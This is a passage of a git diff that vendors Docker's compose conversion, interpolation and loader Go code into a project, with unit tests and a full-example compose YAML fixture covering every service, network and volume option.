+		var cpus int64
+		if source.Limits.NanoCPUs != "" {
+			cpus, err = opts.ParseCPUs(source.Limits.NanoCPUs)
+			if err != nil {
+				return nil, err
+			}
+		}
+		resources.Limits = &swarm.Resources{
+			NanoCPUs:    cpus,
+			MemoryBytes: int64(source.Limits.MemoryBytes),
+		}
+	}
+	if source.Reservations != nil {
+		var cpus int64
+		if source.Reservations.NanoCPUs != "" {
+			cpus, err = opts.ParseCPUs(source.Reservations.NanoCPUs)
+			if err != nil {
+				return nil, err
+			}
+		}
+		resources.Reservations = &swarm.Resources{
+			NanoCPUs:    cpus,
+			MemoryBytes: int64(source.Reservations.MemoryBytes),
+		}
+	}
+	return resources, nil
+
+}
+
+type byPublishedPort []swarm.PortConfig
+
+func (a byPublishedPort) Len() int           { return len(a) }
+func (a byPublishedPort) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
+func (a byPublishedPort) Less(i, j int) bool { return a[i].PublishedPort < a[j].PublishedPort }
+
+func convertEndpointSpec(source []string) (*swarm.EndpointSpec, error) {
+	portConfigs := []swarm.PortConfig{}
+	ports, portBindings, err := nat.ParsePortSpecs(source)
+	if err != nil {
+		return nil, err
+	}
+
+	for port := range ports {
+		portConfigs = append(
+			portConfigs,
+			opts.ConvertPortToPortConfig(port, portBindings)...)
+	}
+
+	// Sorting to make sure these are always in the same order
+	sort.Sort(byPublishedPort(portConfigs))
+
+	return &swarm.EndpointSpec{Ports: portConfigs}, nil
+}
+
+func convertEnvironment(source map[string]string) []string {
+	var output []string
+
+	for name, value := range source {
+		output = append(output, fmt.Sprintf("%s=%s", name, value))
+	}
+
+	return output
+}
+
+func convertDeployMode(mode string, replicas *uint64) (swarm.ServiceMode, error) {
+	serviceMode := swarm.ServiceMode{}
+
+	switch mode {
+	case "global":
+		if replicas != nil {
+			return serviceMode, fmt.Errorf("replicas can only be used with replicated mode")
+		}
+		serviceMode.Global = &swarm.GlobalService{}
+	case "replicated", "":
+		serviceMode.Replicated = &swarm.ReplicatedService{Replicas: replicas}
+	default:
+		return serviceMode, fmt.Errorf("Unknown mode: %s", mode)
+	}
+	return serviceMode, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go
new file mode 100644
index 0000000000..2e614d730c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go
@@ -0,0 +1,216 @@
+package convert
+
+import (
+	"sort"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/swarm"
+	composetypes "github.com/docker/docker/cli/compose/types"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestConvertRestartPolicyFromNone(t *testing.T) {
+	policy, err := convertRestartPolicy("no", nil)
+	assert.NilError(t, err)
+	assert.Equal(t, policy, (*swarm.RestartPolicy)(nil))
+}
+
+func TestConvertRestartPolicyFromUnknown(t *testing.T) {
+	_, err := convertRestartPolicy("unknown", nil)
+	assert.Error(t, err, "unknown restart policy: unknown")
+}
+
+func TestConvertRestartPolicyFromAlways(t *testing.T) {
+	policy, err := convertRestartPolicy("always", nil)
+	expected := &swarm.RestartPolicy{
+		Condition: swarm.RestartPolicyConditionAny,
+	}
+	assert.NilError(t, err)
+	assert.DeepEqual(t, policy, expected)
+}
+
+func TestConvertRestartPolicyFromFailure(t *testing.T) {
+	policy, err := convertRestartPolicy("on-failure:4", nil)
+	attempts := uint64(4)
+	expected := &swarm.RestartPolicy{
+		Condition:   swarm.RestartPolicyConditionOnFailure,
+		MaxAttempts: &attempts,
+	}
+	assert.NilError(t, err)
+	assert.DeepEqual(t, policy, expected)
+}
+
+func TestConvertEnvironment(t *testing.T) {
+	source := map[string]string{
+		"foo": "bar",
+		"key": "value",
+	}
+	env := convertEnvironment(source)
+	sort.Strings(env)
+	assert.DeepEqual(t, env, []string{"foo=bar", "key=value"})
+}
+
+func TestConvertResourcesFull(t *testing.T) {
+	source := composetypes.Resources{
+		Limits: &composetypes.Resource{
+			NanoCPUs:    "0.003",
+			MemoryBytes: composetypes.UnitBytes(300000000),
+		},
+		Reservations: &composetypes.Resource{
+			NanoCPUs:    "0.002",
+			MemoryBytes: composetypes.UnitBytes(200000000),
+		},
+	}
+	resources, err := convertResources(source)
+	assert.NilError(t, err)
+
+	expected := &swarm.ResourceRequirements{
+		Limits: &swarm.Resources{
+			NanoCPUs:    3000000,
+			MemoryBytes: 300000000,
+		},
+		Reservations: &swarm.Resources{
+			NanoCPUs:    2000000,
+			MemoryBytes: 200000000,
+		},
+	}
+	assert.DeepEqual(t, resources, expected)
+}
+
+func TestConvertResourcesOnlyMemory(t *testing.T) {
+	source := composetypes.Resources{
+		Limits: &composetypes.Resource{
+			MemoryBytes: composetypes.UnitBytes(300000000),
+		},
+		Reservations: &composetypes.Resource{
+			MemoryBytes: composetypes.UnitBytes(200000000),
+		},
+	}
+	resources, err := convertResources(source)
+	assert.NilError(t, err)
+
+	expected := &swarm.ResourceRequirements{
+		Limits: &swarm.Resources{
+			MemoryBytes: 300000000,
+		},
+		Reservations: &swarm.Resources{
+			MemoryBytes: 200000000,
+		},
+	}
+	assert.DeepEqual(t, resources, expected)
+}
+
+func TestConvertHealthcheck(t *testing.T) {
+	retries := uint64(10)
+	source := &composetypes.HealthCheckConfig{
+		Test:     []string{"EXEC", "touch", "/foo"},
+		Timeout:  "30s",
+		Interval: "2ms",
+		Retries:  &retries,
+	}
+	expected := &container.HealthConfig{
+		Test:     source.Test,
+		Timeout:  30 * time.Second,
+		Interval: 2 * time.Millisecond,
+		Retries:  10,
+	}
+
+	healthcheck, err := convertHealthcheck(source)
+	assert.NilError(t, err)
+	assert.DeepEqual(t, healthcheck, expected)
+}
+
+func TestConvertHealthcheckDisable(t *testing.T) {
+	source := &composetypes.HealthCheckConfig{Disable: true}
+	expected := &container.HealthConfig{
+		Test: []string{"NONE"},
+	}
+
+	healthcheck, err := convertHealthcheck(source)
+	assert.NilError(t, err)
+	assert.DeepEqual(t, healthcheck, expected)
+}
+
+func TestConvertHealthcheckDisableWithTest(t *testing.T) {
+	source := &composetypes.HealthCheckConfig{
+		Disable: true,
+		Test:    []string{"EXEC", "touch"},
+	}
+	_, err := convertHealthcheck(source)
+	assert.Error(t, err, "test and disable can't be set")
+}
+
+func TestConvertServiceNetworksOnlyDefault(t *testing.T) {
+	networkConfigs := networkMap{}
+	networks := map[string]*composetypes.ServiceNetworkConfig{}
+
+	configs, err := convertServiceNetworks(
+		networks, networkConfigs, NewNamespace("foo"), "service")
+
+	expected := []swarm.NetworkAttachmentConfig{
+		{
+			Target:  "foo_default",
+			Aliases: []string{"service"},
+		},
+	}
+
+	assert.NilError(t, err)
+	assert.DeepEqual(t, configs, expected)
+}
+
+func TestConvertServiceNetworks(t *testing.T) {
+	networkConfigs := networkMap{
+		"front": composetypes.NetworkConfig{
+			External: composetypes.External{
+				External: true,
+				Name:     "fronttier",
+			},
+		},
+		"back": composetypes.NetworkConfig{},
+	}
+	networks := map[string]*composetypes.ServiceNetworkConfig{
+		"front": {
+			Aliases: []string{"something"},
+		},
+		"back": {
+			Aliases: []string{"other"},
+		},
+	}
+
+	configs, err := convertServiceNetworks(
+		networks, networkConfigs, NewNamespace("foo"), "service")
+
+	expected := []swarm.NetworkAttachmentConfig{
+		{
+			Target:  "foo_back",
+			Aliases: []string{"other", "service"},
+		},
+		{
+			Target:  "fronttier",
+			Aliases: []string{"something", "service"},
+		},
+	}
+
+	sortedConfigs := byTargetSort(configs)
+	sort.Sort(&sortedConfigs)
+
+	assert.NilError(t, err)
+	assert.DeepEqual(t, []swarm.NetworkAttachmentConfig(sortedConfigs), expected)
+}
+
+type byTargetSort []swarm.NetworkAttachmentConfig
+
+func (s byTargetSort) Len() int {
+	return len(s)
+}
+
+func (s byTargetSort) Less(i, j int) bool {
+	return strings.Compare(s[i].Target, s[j].Target) < 0
+}
+
+func (s byTargetSort) Swap(i, j int) {
+	s[i], s[j] = s[j], s[i]
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume.go b/vendor/github.com/docker/docker/cli/compose/convert/volume.go
new file mode 100644
index 0000000000..24442d4dc7
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/convert/volume.go
@@ -0,0 +1,128 @@
+package convert
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types/mount"
+	composetypes "github.com/docker/docker/cli/compose/types"
+)
+
+type volumes map[string]composetypes.VolumeConfig
+
+// Volumes from compose-file types to engine api types
+func Volumes(serviceVolumes []string, stackVolumes volumes, namespace Namespace) ([]mount.Mount, error) {
+	var mounts []mount.Mount
+
+	for _, volumeSpec := range serviceVolumes {
+		mount, err := convertVolumeToMount(volumeSpec, stackVolumes, namespace)
+		if err != nil {
+			return nil, err
+		}
+		mounts = append(mounts, mount)
+	}
+	return mounts, nil
+}
+
+func convertVolumeToMount(volumeSpec string, stackVolumes volumes, namespace Namespace) (mount.Mount, error) {
+	var source, target string
+	var mode []string
+
+	// TODO: split Windows path mappings properly
+	parts := strings.SplitN(volumeSpec, ":", 3)
+
+	for _, part := range parts {
+		if strings.TrimSpace(part) == "" {
+			return mount.Mount{}, fmt.Errorf("invalid volume: %s", volumeSpec)
+		}
+	}
+
+	switch len(parts) {
+	case 3:
+		source = parts[0]
+		target = parts[1]
+		mode = strings.Split(parts[2], ",")
+	case 2:
+		source = parts[0]
+		target = parts[1]
+	case 1:
+		target = parts[0]
+	}
+
+	if source == "" {
+		// Anonymous volume
+		return mount.Mount{
+			Type:   mount.TypeVolume,
+			Target: target,
+		}, nil
+	}
+
+	// TODO: catch Windows paths here
+	if strings.HasPrefix(source, "/") {
+		return mount.Mount{
+			Type:        mount.TypeBind,
+			Source:      source,
+			Target:      target,
+			ReadOnly:    isReadOnly(mode),
+			BindOptions: getBindOptions(mode),
+		}, nil
+	}
+
+	stackVolume, exists := stackVolumes[source]
+	if !exists {
+		return mount.Mount{}, fmt.Errorf("undefined volume: %s", source)
+	}
+
+	var volumeOptions *mount.VolumeOptions
+	if stackVolume.External.Name != "" {
+		source = stackVolume.External.Name
+	} else {
+		volumeOptions = &mount.VolumeOptions{
+			Labels: AddStackLabel(namespace, stackVolume.Labels),
+			NoCopy: isNoCopy(mode),
+		}
+
+		if stackVolume.Driver != "" {
+			volumeOptions.DriverConfig = &mount.Driver{
+				Name:    stackVolume.Driver,
+				Options: stackVolume.DriverOpts,
+			}
+		}
+		source = namespace.Scope(source)
+	}
+	return mount.Mount{
+		Type:          mount.TypeVolume,
+		Source:        source,
+		Target:        target,
+		ReadOnly:      isReadOnly(mode),
+		VolumeOptions: volumeOptions,
+	}, nil
+}
+
+func modeHas(mode []string, field string) bool {
+	for _, item := range mode {
+		if item == field {
+			return true
+		}
+	}
+	return false
+}
+
+func isReadOnly(mode []string) bool {
+	return modeHas(mode, "ro")
+}
+
+func isNoCopy(mode []string) bool {
+	return modeHas(mode, "nocopy")
+}
+
+func getBindOptions(mode []string) *mount.BindOptions {
+	for _, item := range mode {
+		for _, propagation := range mount.Propagations {
+			if mount.Propagation(item) == propagation {
+				return &mount.BindOptions{Propagation: mount.Propagation(item)}
+			}
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go
new file mode 100644
index 0000000000..113ab1e1b6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go
@@ -0,0 +1,133 @@
+package convert
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/mount"
+	composetypes "github.com/docker/docker/cli/compose/types"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestIsReadOnly(t *testing.T) {
+	assert.Equal(t, isReadOnly([]string{"foo", "bar", "ro"}), true)
+	assert.Equal(t, isReadOnly([]string{"ro"}), true)
+	assert.Equal(t, isReadOnly([]string{}), false)
+	assert.Equal(t, isReadOnly([]string{"foo", "rw"}), false)
+	assert.Equal(t, isReadOnly([]string{"foo"}), false)
+}
+
+func TestIsNoCopy(t *testing.T) {
+	assert.Equal(t, isNoCopy([]string{"foo", "bar", "nocopy"}), true)
+	assert.Equal(t, isNoCopy([]string{"nocopy"}), true)
+	assert.Equal(t, isNoCopy([]string{}), false)
+	assert.Equal(t, isNoCopy([]string{"foo", "rw"}), false)
+}
+
+func TestGetBindOptions(t *testing.T) {
+	opts := getBindOptions([]string{"slave"})
+	expected := mount.BindOptions{Propagation: mount.PropagationSlave}
+	assert.Equal(t, *opts, expected)
+}
+
+func TestGetBindOptionsNone(t *testing.T) {
+	opts := getBindOptions([]string{"ro"})
+	assert.Equal(t, opts, (*mount.BindOptions)(nil))
+}
+
+func TestConvertVolumeToMountNamedVolume(t *testing.T) {
+	stackVolumes := volumes{
+		"normal": composetypes.VolumeConfig{
+			Driver: "glusterfs",
+			DriverOpts: map[string]string{
+				"opt": "value",
+			},
+			Labels: map[string]string{
+				"something": "labeled",
+			},
+		},
+	}
+	namespace := NewNamespace("foo")
+	expected := mount.Mount{
+		Type:     mount.TypeVolume,
+		Source:   "foo_normal",
+		Target:   "/foo",
+		ReadOnly: true,
+		VolumeOptions: &mount.VolumeOptions{
+			Labels: map[string]string{
+				LabelNamespace: "foo",
+				"something":    "labeled",
+			},
+			DriverConfig: &mount.Driver{
+				Name: "glusterfs",
+				Options: map[string]string{
+					"opt": "value",
+				},
+			},
+		},
+	}
+	mount, err := convertVolumeToMount("normal:/foo:ro", stackVolumes, namespace)
+	assert.NilError(t, err)
+	assert.DeepEqual(t, mount, expected)
+}
+
+func TestConvertVolumeToMountNamedVolumeExternal(t *testing.T) {
+	stackVolumes := volumes{
+		"outside": composetypes.VolumeConfig{
+			External: composetypes.External{
+				External: true,
+				Name:     "special",
+			},
+		},
+	}
+	namespace := NewNamespace("foo")
+	expected := mount.Mount{
+		Type:   mount.TypeVolume,
+		Source: "special",
+		Target: "/foo",
+	}
+	mount, err := convertVolumeToMount("outside:/foo", stackVolumes, namespace)
+	assert.NilError(t, err)
+	assert.DeepEqual(t, mount, expected)
+}
+
+func TestConvertVolumeToMountBind(t *testing.T) {
+	stackVolumes := volumes{}
+	namespace := NewNamespace("foo")
+	expected := mount.Mount{
+		Type:        mount.TypeBind,
+		Source:      "/bar",
+		Target:      "/foo",
+		ReadOnly:    true,
+		BindOptions: &mount.BindOptions{Propagation: mount.PropagationShared},
+	}
+	mount, err := convertVolumeToMount("/bar:/foo:ro,shared", stackVolumes, namespace)
+	assert.NilError(t, err)
+	assert.DeepEqual(t, mount, expected)
+}
+
+func TestConvertVolumeToMountVolumeDoesNotExist(t *testing.T) {
+	namespace := NewNamespace("foo")
+	_, err := convertVolumeToMount("unknown:/foo:ro", volumes{}, namespace)
+	assert.Error(t, err, "undefined volume: unknown")
+}
+
+func TestConvertVolumeToMountAnonymousVolume(t *testing.T) {
+	stackVolumes := map[string]composetypes.VolumeConfig{}
+	namespace := NewNamespace("foo")
+	expected := mount.Mount{
+		Type:   mount.TypeVolume,
+		Target: "/foo/bar",
+	}
+	mnt, err := convertVolumeToMount("/foo/bar", stackVolumes, namespace)
+	assert.NilError(t, err)
+	assert.DeepEqual(t, mnt, expected)
+}
+
+func TestConvertVolumeToMountInvalidFormat(t *testing.T) {
+	namespace := NewNamespace("foo")
+	invalids := []string{"::", "::cc", ":bb:", "aa::", "aa::cc", "aa:bb:", " : : ", " : :cc", " :bb: ", "aa: : ", "aa: :cc", "aa:bb: "}
+	for _, vol := range invalids {
+		_, err := convertVolumeToMount(vol, map[string]composetypes.VolumeConfig{}, namespace)
+		assert.Error(t, err, "invalid volume: "+vol)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go
new file mode 100644
index 0000000000..734f28ec9d
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go
@@ -0,0 +1,90 @@
+package interpolation
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/cli/compose/template"
+	"github.com/docker/docker/cli/compose/types"
+)
+
+// Interpolate replaces variables in a string with the values from a mapping
+func Interpolate(config types.Dict, section string, mapping template.Mapping) (types.Dict, error) {
+	out := types.Dict{}
+
+	for name, item := range config {
+		if item == nil {
+			out[name] = nil
+			continue
+		}
+		interpolatedItem, err := interpolateSectionItem(name, item.(types.Dict), section, mapping)
+		if err != nil {
+			return nil, err
+		}
+		out[name] = interpolatedItem
+	}
+
+	return out, nil
+}
+
+func interpolateSectionItem(
+	name string,
+	item types.Dict,
+	section string,
+	mapping template.Mapping,
+) (types.Dict, error) {
+
+	out := types.Dict{}
+
+	for key, value := range item {
+		interpolatedValue, err := recursiveInterpolate(value, mapping)
+		if err != nil {
+			return nil, fmt.Errorf(
+				"Invalid interpolation format for %#v option in %s %#v: %#v",
+				key, section, name, err.Template,
+			)
+		}
+		out[key] = interpolatedValue
+	}
+
+	return out, nil
+
+}
+
+func recursiveInterpolate(
+	value interface{},
+	mapping template.Mapping,
+) (interface{}, *template.InvalidTemplateError) {
+
+	switch value := value.(type) {
+
+	case string:
+		return template.Substitute(value, mapping)
+
+	case types.Dict:
+		out := types.Dict{}
+		for key, elem := range value {
+			interpolatedElem, err := recursiveInterpolate(elem, mapping)
+			if err != nil {
+				return nil, err
+			}
+			out[key] = interpolatedElem
+		}
+		return out, nil
+
+	case []interface{}:
+		out := make([]interface{}, len(value))
+		for i, elem := range value {
+			interpolatedElem, err := recursiveInterpolate(elem, mapping)
+			if err != nil {
+				return nil, err
+			}
+			out[i] = interpolatedElem
+		}
+		return out, nil
+
+	default:
+		return value, nil
+
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go
new file mode 100644
index 0000000000..c3921701b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go
@@ -0,0 +1,59 @@
+package interpolation
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+
+	"github.com/docker/docker/cli/compose/types"
+)
+
+var defaults = map[string]string{
+	"USER": "jenny",
+	"FOO":  "bar",
+}
+
+func defaultMapping(name string) (string, bool) {
+	val, ok := defaults[name]
+	return val, ok
+}
+
+func TestInterpolate(t *testing.T) {
+	services := types.Dict{
+		"servicea": types.Dict{
+			"image":   "example:${USER}",
+			"volumes": []interface{}{"$FOO:/target"},
+			"logging": types.Dict{
+				"driver": "${FOO}",
+				"options": types.Dict{
+					"user": "$USER",
+				},
+			},
+		},
+	}
+	expected := types.Dict{
+		"servicea": types.Dict{
+			"image":   "example:jenny",
+			"volumes": []interface{}{"bar:/target"},
+			"logging": types.Dict{
+				"driver": "bar",
+				"options": types.Dict{
+					"user": "jenny",
+				},
+			},
+		},
+	}
+	result, err := Interpolate(services, "service", defaultMapping)
+	assert.NoError(t, err)
+	assert.Equal(t, expected, result)
+}
+
+func TestInvalidInterpolation(t *testing.T) {
+	services := types.Dict{
+		"servicea": types.Dict{
+			"image": "${",
+		},
+	}
+	_, err := Interpolate(services, "service", defaultMapping)
+	assert.EqualError(t, err, `Invalid interpolation format for "image" option in service "servicea": "${"`)
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example1.env b/vendor/github.com/docker/docker/cli/compose/loader/example1.env
new file mode 100644
index 0000000000..3e7a059613
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/loader/example1.env
@@ -0,0 +1,8 @@
+# passed through
+FOO=1
+
+# overridden in example2.env
+BAR=1
+
+# overridden in full-example.yml
+BAZ=1
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example2.env b/vendor/github.com/docker/docker/cli/compose/loader/example2.env
new file mode 100644
index 0000000000..0920d5ab05
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/loader/example2.env
@@ -0,0 +1 @@
+BAR=2
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml
new file mode 100644
index 0000000000..fb5686a380
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml
@@ -0,0 +1,287 @@
+version: "3"
+
+services:
+  foo:
+    cap_add:
+      - ALL
+
+    cap_drop:
+      - NET_ADMIN
+      - SYS_ADMIN
+
+    cgroup_parent: m-executor-abcd
+
+    # String or list
+    command: bundle exec thin -p 3000
+    # command: ["bundle", "exec", "thin", "-p", "3000"]
+
+    container_name: my-web-container
+
+    depends_on:
+      - db
+      - redis
+
+    deploy:
+      mode: replicated
+      replicas: 6
+      labels: [FOO=BAR]
+      update_config:
+        parallelism: 3
+        delay: 10s
+        failure_action: continue
+        monitor: 60s
+        max_failure_ratio: 0.3
+      resources:
+        limits:
+          cpus: '0.001'
+          memory: 50M
+        reservations:
+          cpus: '0.0001'
+          memory: 20M
+      restart_policy:
+        condition: on_failure
+        delay: 5s
+        max_attempts: 3
+        window: 120s
+      placement:
+        constraints: [node=foo]
+
+    devices:
+      - "/dev/ttyUSB0:/dev/ttyUSB0"
+
+    # String or list
+    # dns: 8.8.8.8
+    dns:
+      - 8.8.8.8
+      - 9.9.9.9
+
+    # String or list
+    # dns_search: example.com
+    dns_search:
+      - dc1.example.com
+      - dc2.example.com
+
+    domainname: foo.com
+
+    # String or list
+    # entrypoint: /code/entrypoint.sh -p 3000
+    entrypoint: ["/code/entrypoint.sh", "-p", "3000"]
+
+    # String or list
+    # env_file: .env
+    env_file:
+      - ./example1.env
+      - ./example2.env
+
+    # Mapping or list
+    # Mapping values can be strings, numbers or null
+    # Booleans are not allowed - must be quoted
+    environment:
+      RACK_ENV: development
+      SHOW: 'true'
+      SESSION_SECRET:
+      BAZ: 3
+    # environment:
+    #   - RACK_ENV=development
+    #   - SHOW=true
+    #   - SESSION_SECRET
+
+    # Items can be strings or numbers
+    expose:
+     - "3000"
+     - 8000
+
+    external_links:
+      - redis_1
+      - project_db_1:mysql
+      - project_db_1:postgresql
+
+    # Mapping or list
+    # Mapping values must be strings
+    # extra_hosts:
+    #   somehost: "162.242.195.82"
+    #   otherhost: "50.31.209.229"
+    extra_hosts:
+      - "somehost:162.242.195.82"
+      - "otherhost:50.31.209.229"
+
+    hostname: foo
+
+    healthcheck:
+      test: echo "hello world"
+      interval: 10s
+      timeout: 1s
+      retries: 5
+
+    # Any valid image reference - repo, tag, id, sha
+    image: redis
+    # image: ubuntu:14.04
+    # image: tutum/influxdb
+    # image: example-registry.com:4000/postgresql
+    # image: a4bc65fd
+    # image: busybox@sha256:38a203e1986cf79639cfb9b2e1d6e773de84002feea2d4eb006b52004ee8502d
+
+    ipc: host
+
+    # Mapping or list
+    # Mapping values can be strings, numbers or null
+    labels:
+      com.example.description: "Accounting webapp"
+      com.example.number: 42
+      com.example.empty-label:
+    # labels:
+    #   - "com.example.description=Accounting webapp"
+    #   - "com.example.number=42"
+    #   - "com.example.empty-label"
+
+    links:
+     - db
+     - db:database
+     - redis
+
+    logging:
+      driver: syslog
+      options:
+        syslog-address: "tcp://192.168.0.42:123"
+
+    mac_address: 02:42:ac:11:65:43
+
+    # network_mode: "bridge"
+    # network_mode: "host"
+    # network_mode: "none"
+    # Use the network mode of an arbitrary container from another service
+    # network_mode: "service:db"
+    # Use the network mode of another container, specified by name or id
+    # network_mode: "container:some-container"
+    network_mode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b"
+
+    networks:
+      some-network:
+        aliases:
+         - alias1
+         - alias3
+      other-network:
+        ipv4_address: 172.16.238.10
+        ipv6_address: 2001:3984:3989::10
+      other-other-network:
+
+    pid: "host"
+
+    ports:
+      - 3000
+      - "3000-3005"
+      - "8000:8000"
+      - "9090-9091:8080-8081"
+      - "49100:22"
+      - "127.0.0.1:8001:8001"
+      - "127.0.0.1:5000-5010:5000-5010"
+
+    privileged: true
+
+    read_only: true
+
+    restart: always
+
+    security_opt:
+      - label=level:s0:c100,c200
+      - label=type:svirt_apache_t
+
+    stdin_open: true
+
+    stop_grace_period: 20s
+
+    stop_signal: SIGUSR1
+
+    # String or list
+    # tmpfs: /run
+    tmpfs:
+      - /run
+      - /tmp
+
+    tty: true
+
+    ulimits:
+      # Single number or mapping with soft + hard limits
+      nproc: 65535
+      nofile:
+        soft: 20000
+        hard: 40000
+
+    user: someone
+
+    volumes:
+      # Just specify a path and let the Engine create a volume
+      - /var/lib/mysql
+      # Specify an absolute path mapping
+      - /opt/data:/var/lib/mysql
+      # Path on the host, relative to the Compose file
+      - .:/code
+      - ./static:/var/www/html
+      # User-relative path
+      - ~/configs:/etc/configs/:ro
+      # Named volume
+      - datavolume:/var/lib/mysql
+
+    working_dir: /code
+
+networks:
+  # Entries can be null, which specifies simply that a network
+  # called "{project name}_some-network" should be created and
+  # use the default driver
+  some-network:
+
+  other-network:
+    driver: overlay
+
+    driver_opts:
+      # Values can be strings or numbers
+      foo: "bar"
+      baz: 1
+
+    ipam:
+      driver: overlay
+      # driver_opts:
+      #   # Values can be strings or numbers
+      #   com.docker.network.enable_ipv6: "true"
+      #   com.docker.network.numeric_value: 1
+      config:
+      - subnet: 172.16.238.0/24
+        # gateway: 172.16.238.1
+      - subnet: 2001:3984:3989::/64
+        # gateway: 2001:3984:3989::1
+
+  external-network:
+    # Specifies that a pre-existing network called "external-network"
+    # can be referred to within this file as "external-network"
+    external: true
+
+  other-external-network:
+    # Specifies that a pre-existing network called "my-cool-network"
+    # can be referred to within this file as "other-external-network"
+    external:
+      name: my-cool-network
+
+volumes:
+  # Entries can be null, which specifies simply that a volume
+  # called "{project name}_some-volume" should be created and
+  # use the default driver
+  some-volume:
+
+  other-volume:
+    driver: flocker
+
+    driver_opts:
+      # Values can be strings or numbers
+      foo: "bar"
+      baz: 1
+
+  external-volume:
+    # Specifies that a pre-existing volume called "external-volume"
+    # can be referred to within this file as "external-volume"
+    external: true
+
+  other-external-volume:
+    # Specifies that a pre-existing volume called "my-cool-volume"
+    # can be referred to within this file as "other-external-volume"
+    external:
+      name: my-cool-volume
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader.go b/vendor/github.com/docker/docker/cli/compose/loader/loader.go
new file mode 100644
index 0000000000..39f69a03ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/loader/loader.go
@@ -0,0 +1,653 @@
+package loader
+
+import (
+	"fmt"
+	"os"
+	"path"
+	"reflect"
+	"regexp"
+	"sort"
+	"strings"
+
+	"github.com/docker/docker/cli/compose/interpolation"
+	"github.com/docker/docker/cli/compose/schema"
+	"github.com/docker/docker/cli/compose/types"
+	"github.com/docker/docker/runconfig/opts"
+	units "github.com/docker/go-units"
+	shellwords "github.com/mattn/go-shellwords"
+	"github.com/mitchellh/mapstructure"
+	yaml "gopkg.in/yaml.v2"
+)
+
+var (
+	fieldNameRegexp = regexp.MustCompile("[A-Z][a-z0-9]+")
+)
+
+// ParseYAML reads the bytes from a file, parses the bytes into a mapping
+// structure, and returns it.
+func ParseYAML(source []byte) (types.Dict, error) {
+	var cfg interface{}
+	if err := yaml.Unmarshal(source, &cfg); err != nil {
+		return nil, err
+	}
+	cfgMap, ok := cfg.(map[interface{}]interface{})
+	if !ok {
+		return nil, fmt.Errorf("Top-level object must be a mapping")
+	}
+	converted, err := convertToStringKeysRecursive(cfgMap, "")
+	if err != nil {
+		return nil, err
+	}
+	return converted.(types.Dict), nil
+}
+
+// Load reads a ConfigDetails and returns a fully loaded configuration
+func Load(configDetails types.ConfigDetails) (*types.Config, error) {
+	if len(configDetails.ConfigFiles) < 1 {
+		return nil, fmt.Errorf("No files specified")
+	}
+	if len(configDetails.ConfigFiles) > 1 {
+		return nil, fmt.Errorf("Multiple files are not yet supported")
+	}
+
+	configDict := getConfigDict(configDetails)
+
+	if services, ok := configDict["services"]; ok {
+		if servicesDict, ok := services.(types.Dict); ok {
+			forbidden := getProperties(servicesDict, types.ForbiddenProperties)
+
+			if len(forbidden) > 0 {
+				return nil, &ForbiddenPropertiesError{Properties: forbidden}
+			}
+		}
+	}
+
+	if err := schema.Validate(configDict, schema.Version(configDict)); err != nil {
+		return nil, err
+	}
+
+	cfg := types.Config{}
+	if services, ok := configDict["services"]; ok {
+		servicesConfig, err := interpolation.Interpolate(services.(types.Dict), "service", os.LookupEnv)
+		if err != nil {
+			return nil, err
+		}
+
+		servicesList, err := loadServices(servicesConfig, configDetails.WorkingDir)
+		if err != nil {
+			return nil, err
+		}
+
+		cfg.Services = servicesList
+	}
+
+	if networks, ok := configDict["networks"]; ok {
+		networksConfig, err := interpolation.Interpolate(networks.(types.Dict), "network", os.LookupEnv)
+		if err != nil {
+			return nil, err
+		}
+
+		networksMapping, err := loadNetworks(networksConfig)
+		if err != nil {
+			return nil, err
+		}
+
+		cfg.Networks = networksMapping
+	}
+
+	if volumes, ok := configDict["volumes"]; ok {
+		volumesConfig, err := interpolation.Interpolate(volumes.(types.Dict), "volume", os.LookupEnv)
+		if err != nil {
+			return nil, err
+		}
+
+		volumesMapping, err := loadVolumes(volumesConfig)
+		if err != nil {
+			return nil, err
+		}
+
+		cfg.Volumes = volumesMapping
+	}
+
+	if secrets, ok := configDict["secrets"]; ok {
+		secretsConfig, err := interpolation.Interpolate(secrets.(types.Dict), "secret", os.LookupEnv)
+		if err != nil {
+			return nil, err
+		}
+
+		secretsMapping, err := loadSecrets(secretsConfig, configDetails.WorkingDir)
+		if err != nil {
+			return nil, err
+		}
+
+		cfg.Secrets = secretsMapping
+	}
+
+	return &cfg, nil
+}
+
+// GetUnsupportedProperties returns the list of any unsupported properties that are
+// used in the Compose files.
